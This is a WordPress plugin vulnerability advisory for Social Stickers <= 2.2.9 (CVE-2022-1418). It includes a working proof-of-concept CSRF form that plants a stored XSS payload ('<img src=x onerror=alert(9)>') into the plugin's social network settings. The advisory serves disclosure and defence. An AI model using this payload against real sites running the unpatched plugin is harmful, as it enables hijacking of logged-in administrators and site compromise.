WordPress Plugin Vulnerabilities

Social Stickers <= 2.2.9 - Stored Cross-Site Scripting via CSRF

Description

The plugin does not have CSRF checks in place when updating its Social Network settings, and does not escape some of these fields, which could allow attackers to make a logged-in admin change them and lead to Stored Cross-Site Scripting issues.

Proof of Concept

<html>
<body>
<script>history.pushState('', '', '/')</script>

<form action="http://localhost/wordpress/wp-admin/options-general.php?page=social-
stickers%2Fsocial-stickers.php&tab=social_networks" method="POST">

<input type="hidden" name="aim" value="" />

<input type="hidden" name="behance"
value="hello "><img src=x onerror=alert(9
)>" />
<input type="hidden" name="bebo" value="" />
<input type="hidden" name="blogger" value="" />
<input type="hidden" name="delicious" value="" />
<input type="hidden" name="designfloat" value="" />
<input type="hidden" name="deviantart" value="" />
<input type="hidden" name="digg" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="flickr" value="" />
<input type="hidden" name="facebook" value="" />
<input type="hidden" name="googleplus" value="" />
<input type="hidden" name="lastfm" value="" />
<input type="hidden" name="linkedin" value="" />
<input type="hidden" name="myspace" value="" />
<input type="hidden" name="newsvine" value="" />
<input type="hidden" name="picasa" value="" />
<input type="hidden" name="posterous" value="" />
<input type="hidden" name="rss" value="" />
<input type="hidden" name="qik" value="" />
<input type="hidden" name="slashdot" value="" />
<input type="hidden" name="skype" value="" />
<input type="hidden" name="stumbleupon" value="" />
<input type="hidden" name="tumblr" value="" />
<input type="hidden" name="twitter" value="" />
<input type="hidden" name="vimeo" value="" />
<input type="hidden" name="youtube" value="" />
<input type="hidden" name="wordpress" value="" />
<input type="hidden" name="Submit" value="Update usernames" />
<input type="hidden" name="social-stickers-settings-submit" value="Y" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugins

Plugin icon
social-stickers
No known fix

References

CVE
CVE-2022-1418

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
WPVDB ID
3851e61e-f462-4259-af0a-8d832809d559

Timeline

Publicly Published
2022-04-20 (about 2 years ago)
Added
2022-04-20 (about 2 years ago)
Last Updated
2022-04-21 (about 2 years ago)

Other

Published
Title
Published
2023-03-20
Title
All-In-One Security (AIOS) < 5.1.5 - Admin+ Stored XSS
Published
2023-11-06
Title
Featured Image Caption < 0.8.11 - Contributor+ Stored XSS
Published
2023-02-13
Title
Cost Calculator <= 1.8 - Contributor+ Stored XSS
Published
2024-01-08
Title
Formidable Forms < 6.7.1 - HTML Injection
Published
2008-07-09
Title
Tubepress < 1.6.5 - XSS